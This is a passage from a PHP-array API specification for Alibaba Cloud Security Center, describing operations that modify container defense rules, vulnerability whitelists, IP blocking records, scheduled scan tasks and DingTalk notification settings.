false, 'example' => 'c54b***1501', 'title' => ''], 'AllNamespace' => ['description' => 'Specifies whether to include all namespaces. Valid values:'."\n" ."\n" .'- **0**: no'."\n" ."\n" .'- **1**: yes', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'Namespaces' => [ 'description' => 'The namespaces.', 'type' => 'array', 'items' => ['description' => 'The ID of the namespace.', 'type' => 'string', 'required' => false, 'example' => 'kube-system', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The ID of the rule that was modified.', 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'- **true**'."\n" ."\n" .'- **false**', 'type' => 'boolean', 'example' => 'True', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '768DFBE5-*A5DC35**', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code. The value 200 indicates that the request was successful.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 100,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"768DFBE5-*A5DC35**\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'ModifyContainerDefenseRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerDefenseRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyContainerDefenseRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ContainerDefenseRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:containerdefenserule/{#RuleId}'], ], ], ], ], ], 'ModifyContainerDefenseRuleSwitch' => [ 'summary' => 'Modifies the switch status of a non-image program defense rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '163648', 'abilityTreeNodes' => ['FEATUREsas5HPCI8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RuleIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the rules that you want to modify.', 'type' => 'array', 'items' => ['description' => 'The ID of the rule that you want to delete.'."\n" .'> You can call the [ListContainerDefenseRule](~~2590599~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '188', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleSwitch', 'in' => 'query', 'schema' => ['description' => 'The switch status of the rule. Valid values:'."\n" ."\n" .'- **1**: enabled.'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The number of rows that are modified.', 'type' => 'integer', 'format' => 'int64', 'example' => '30', 'title' => ''], 'Success' => ['description' => 'The result status of the call. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C8A137FB-6E18-5741-9B47-D9A0EBA3495F', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify non-image program defense rule switch', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerDefenseRuleSwitch'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyContainerDefenseRuleSwitch', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ContainerDefenseRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:containerdefenserule/{#RuleId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 30,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"C8A137FB-6E18-5741-9B47-D9A0EBA3495F\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ModifyContainerPluginRule' => [ 'summary' => 'Modifies a container escape prevention rule.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" .'> You can call the [ListSasContainerWebDefenseRule](~~2623606~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '100012', 'title' => ''], ], [ 'name' => 'Mode', 'in' => 'query', 'schema' => ['description' => 'The action mode of the rule. Valid values:'."\n" .'- **1**: Alert.'."\n" .'- **2**: Block.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'SelectedPolicy', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of rule items.', 'type' => 'array', 'items' => ['description' => 'The rule item.', 'type' => 'string', 'required' => false, 'example' => 'ssh_user_publickey_config', 'title' => ''], 'required' => false, 'maxItems' => 20, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The rule type. Valid values:'."\n" .'- **0**: User-defined.'."\n" .'- **1**: System built-in.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'default' => '0', 'example' => '0', 'title' => ''], ], [ 'name' => 'WhiteImages', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of whitelisted images.', 'type' => 'array', 'items' => ['description' => 'The whitelisted image.', 'type' => 'string', 'required' => false, 'example' => 'centos', 'title' => ''], 'required' => false, 'maxItems' => 50, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The list of container escape prevention rules.', 'type' => 'object', 'properties' => [ 'RuleId' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '600640', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test555', 'title' => ''], 'SwitchId' => ['description' => 'The corresponding switch ID.', 'type' => 'string', 'example' => 'USER-CONTAINER-RULE-SWITCH-TYPE_xxx', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify a container escape prevention rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerPluginRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyContainerPluginRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"RuleId\\": 600640,\\n \\"RuleName\\": \\"test555\\",\\n \\"SwitchId\\": \\"USER-CONTAINER-RULE-SWITCH-TYPE_xxx\\"\\n },\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\"\\n}","type":"json"}]', ], 'ModifyContainerScanConfig' => [ 'summary' => 'Modifies the container runtime scan configuration.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cfb7a55a81f7246b5ac18845ea79a****', 'title' => ''], ], [ 'name' => 'AppNames', 'in' => 'query', 'schema' => ['description' => 'The name of the container application.', 'type' => 'string', 'required' => false, 'example' => '[\\"logtail-ds\\",\\"alicloud-monitor-controller\\",\\"storage-snapshot-manager\\"]', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The processing result.'."\n" ."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'BFF355BC-8A40-55F3-8CBC-CC3E9DAC****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Modify container runtime scan configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyContainerScanConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"BFF355BC-8A40-55F3-8CBC-CC3E9DAC****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ModifyCreateVulWhitelist' => [ 'summary' => 'Adds vulnerabilities to the whitelist. After you add the vulnerabilities to the whitelist, Security Center no longer generates alerts for the vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Whitelist', 'in' => 'query', 'schema' => ['description' => 'The information about the vulnerability that you want to add to the whitelist. The value is a JSON string that contains the following fields:'."\n" ."\n" .'* **Status**: the status of the vulnerability.'."\n" ."\n" .'* **GmtLast**: the timestamp when the vulnerability was last detected. Unit: milliseconds.'."\n" ."\n" .'* **LaterCount**: the number of vulnerabilities that have the medium priority.'."\n" ."\n" .'* **AsapCount**: the number of vulnerabilities that have the high priority.'."\n" ."\n" .'* **Name**: the name of the vulnerability.'."\n" ."\n" .'* **Type**: the type of the vulnerability. Valid values:'."\n" ."\n" .' * **cve**: Linux software vulnerability'."\n" .' * **sys**: Windows system vulnerability'."\n" .' * **cms**: Web-CMS vulnerability'."\n" .' * **app**: application vulnerability'."\n" .' * **emg**: urgent vulnerability'."\n" ."\n" .'* **Related**: the Common Vulnerabilities and Exposures (CVE) ID of the vulnerability.'."\n" ."\n" .'* **HandledCount**: the number of handled vulnerabilities.'."\n" ."\n" .'* **AliasName**: the alias of the vulnerability.'."\n" ."\n" .'* **RuleModifyTime**: the time when the vulnerability was last disclosed.'."\n" ."\n" .'* **NntfCount**: the number of vulnerabilities that have the low priority.'."\n" ."\n" .'* **TotalFixCount**: the total number of fixed vulnerabilities.'."\n" ."\n" .'* **Tags**: the tag that is added to the vulnerability.'."\n" ."\n" .'> You can call the [DescribeGroupedVul](~~DescribeGroupedVul~~) operation to query the information about the vulnerability that you want to add to the whitelist.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{"Status":0,"GmtLast":1662281929000,"LaterCount":0,"AsapCount":1,"Name":"oval:com.redhat.rhsa:def:20172836","Type":"cve","Related":"CVE-2017-14491,CVE-2017-14492,CVE-2017-14493,CVE-2017-14494,CVE-2017-14495,CVE-2017-14496","HandledCount":1,"AliasName":"RHSA-2017:2836-Critical: dnsmasq security update","RuleModifyTime":1535542395000,"NntfCount":0,"TotalFixCount":196668,"Tags":"Exploit Exists,Code Execution"},{"Status":0,"GmtLast":1662281933000,"LaterCount":0,"AsapCount":1,"Name":"oval:com.redhat.rhsa:def:20173075","Type":"cve","Related":"CVE-2017-13089,CVE-2017-13090","HandledCount":1,"AliasName":"RHSA-2017:3075-Important: wget security update","RuleModifyTime":1551432867000,"NntfCount":0,"TotalFixCount":369136,"Tags":"Code Execution"}]', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason why you add the vulnerability to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'This vulnerability is not harmful', 'title' => ''], ], [ 'name' => 'TargetInfo', 'in' => 'query', 'schema' => ['description' => 'The applicable scope of the whitelist. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **type**: the type of the applicable scope. Valid values:'."\n" ."\n" .' * **GroupId**: the ID of a server group.'."\n" .' * **Uuid**: the UUID of a server.'."\n" ."\n" .'* **uuids**: the UUIDs of servers. This field is of the string type.'."\n" ."\n" .'* **groupIds**: the IDs of server groups. This field is of the long type.'."\n" ."\n" .'> If you leave this parameter empty, the applicable scope is all servers. If you set the **type** field to **GroupId**, you must also specify the **groupIds** field. If you set the **type** field to **Uuid**, you must also specify the **uuids** field.'."\n", 'type' => 'string', 'required' => false, 'example' => '{"type":"Uuid","uuids":["b31a708f-5fea-426e-bebe-a7b0893****","1f749687-3b5d-4e11-8140-d964673****"],"groupIds":[]}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '6B23A612-D997-5176-8C3B-D640DFD65772', 'title' => ''], 'VulWhitelistList' => [ 'description' => 'Vulnerability whitelist information. '."\n" .' This data is not returned when adding or updating the vulnerability whitelist in batches, it is only returned when adding or updating a single vulnerability whitelist entry. ', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'Vulnerability whitelist ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1002', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InnerError', 'errorMessage' => 'InnerError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyCreateVulWhitelist', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyCreateVulWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'VulWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:vulwhitelist/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6B23A612-D997-5176-8C3B-D640DFD65772\\",\\n \\"VulWhitelistList\\": {\\n \\"Id\\": 1002\\n }\\n}","type":"json"}]', ], 'ModifyCustomBlockRecord' => [ 'summary' => 'Modifies the rule record of a custom blocked IP address.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The list of servers.', 'type' => 'string', 'required' => true, 'example' => '2516fe4f-adb6-45d1-87a7-90ce1213****,30746836-68d0-47f6-8b2d-c93150da****,7c3ac531-077b-46b8-8706-5c8d4e73****', 'title' => ''], ], [ 'name' => 'BlockIp', 'in' => 'query', 'schema' => ['description' => 'The IP address blocked for brute-force attacks prevention.', 'type' => 'string', 'required' => true, 'example' => '10.12.XX.XX', 'title' => ''], ], [ 'name' => 'Bound', 'in' => 'query', 'schema' => ['description' => 'The direction in which the brute-force attacks blocking policy blocks the IP address on the server. Valid values:'."\n" .'- **in**: inbound'."\n" .'- **out**: outbound.', 'type' => 'string', 'required' => true, 'example' => 'out', 'title' => ''], ], [ 'name' => 'ExpireTime', 'in' => 'query', 'schema' => ['description' => 'The expiration time of the blocking record.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1940899881000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EE4B1F-CEF8-5A75-86D3-D012CB3D****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify custom rule for brute-force attacks IP blocking', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCustomBlockRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyCustomBlockRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EE4B1F-CEF8-5A75-86D3-D012CB3D****\\"\\n}","type":"json"}]', ], 'ModifyCycleTask' => [ 'summary' => 'Modifies the run epoch of periodic nodes, including image scan, emergency vulnerability scanning, and virus scan nodes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], ], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the configuration.'."\n" .'>Call the [DescribeCycleTaskList](~~DescribeCycleTaskList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '00cfa8161da093089e6804ba6a33****', 'title' => ''], ], [ 'name' => 'TaskName', 'in' => 'query', 'schema' => [ 'description' => 'The node name. Valid values:'."\n" .'- **VIRUS\\_VUL\\_SCHEDULE\\_SCAN**: virus scan.'."\n" .'- **IMAGE_SCAN**: image scan.'."\n" .'- **EMG\\_VUL\\_SCHEDULE\\_SCAN**: emergency vulnerability scanning.', 'enumValueTitles' => ['VIRUS_VUL_SCHEDULE_SCAN' => 'Virus scan.', 'IMAGE_SCAN' => 'Image scan.', 'EMG_VUL_SCHEDULE_SCAN' => 'Emergency vulnerability scanning.'], 'type' => 'string', 'required' => false, 'example' => 'EMG_VUL_SCHEDULE_SCAN', 'title' => '', ], ], [ 'name' => 'TaskType', 'in' => 'query', 'schema' => [ 'description' => 'The node type. Valid values:'."\n" .'- **VIRUS\\_VUL\\_SCHEDULE\\_SCAN**: virus scan.'."\n" .'- **IMAGE_SCAN**: image scan.'."\n" .'- **EMG\\_VUL\\_SCHEDULE\\_SCAN**: emergency vulnerability scanning.', 'enumValueTitles' => ['VIRUS_VUL_SCHEDULE_SCAN' => 'Virus scan.', 'IMAGE_SCAN' => 'Image scan.', 'EMG_VUL_SCHEDULE_SCAN' => 'Emergency vulnerability scanning.'], 'type' => 'string', 'required' => false, 'example' => 'VIRUS_VUL_SCHEDULE_SCAN', 'title' => '', ], ], [ 'name' => 'PeriodUnit', 'in' => 'query', 'schema' => ['description' => 'The unit of the scan cycle. Valid values:'."\n" .'- **day**: day.'."\n" .'- **hour**: hour.', 'type' => 'string', 'required' => false, 'example' => 'day', 'title' => ''], ], [ 'name' => 'IntervalPeriod', 'in' => 'query', 'schema' => ['description' => 'The interval period.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '14', 'title' => ''], ], [ 'name' => 'FirstDateStr', 'in' => 'query', 'schema' => ['description' => 'The first execution time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1664380800000', 'title' => ''], ], [ 'name' => 'TargetStartTime', 'in' => 'query', 'schema' => ['description' => 'The task start time, in hours.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'TargetEndTime', 'in' => 'query', 'schema' => ['description' => 'The task end time, in hours.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '6', 'title' => ''], ], [ 'name' => 'Param', 'in' => 'query', 'schema' => ['description' => 'The extended information field.', 'type' => 'string', 'required' => false, 'example' => '{'."\n" .' "targetInfo": ['."\n" .' {'."\n" .' "type": "groupId",'."\n" .' "name": "TI HOST",'."\n" .' "target": 10597***'."\n" .' },'."\n" .' {'."\n" .' "type": "groupId",'."\n" .' "name": "expense HOST",'."\n" .' "target": 10597***'."\n" .' }'."\n" .' ]'."\n" .'}', 'title' => ''], ], [ 'name' => 'Enable', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to enable the task. Valid values:'."\n" .'- **1**: enabled.'."\n" .'- **0**: disabled.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '1AA33E30-7192-5648-93CD-D0E476A2****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-106', 'errorMessage' => 'The data is not found.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Modify scheduled task cycle', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyCycleTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyCycleTask', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CycleTask', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:cycletask/{#ConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1AA33E30-7192-5648-93CD-D0E476A2****\\"\\n}","type":"json"}]', ], 'ModifyDingTalkStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92363', 'abilityTreeNodes' => ['FEATUREsasDM8NT3'], ], 'parameters' => [ [ 'name' => 'Ids', 'in' => 'query', 'schema' => ['description' => 'The notification IDs of DingTalk chatbots. Separate multiple IDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeDingTalk](~~DescribeDingTalk~~) operation to query the notification IDs.'."\n", 'type' => 'string', 'required' => true, 'example' => '2259', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The notification status of a DingTalk chatbot. Valid values:'."\n" ."\n" .'* **0**: disabled'."\n" .'* **1**: enabled'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '81DCBD76-196C-57A5-9C7D-F14DE8E1****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ModifyDingTalkStatus', 'summary' => 'Changes the notification status of a DingTalk chatbot.', 'description' => 'You can call this operation only if you use Security Center Enterprise.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyDingTalkStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyDingTalkStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"81DCBD76-196C-57A5-9C7D-F14DE8E1****\\"\\n}","type":"json"}]', ], 'ModifyEmgVulSubmit' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 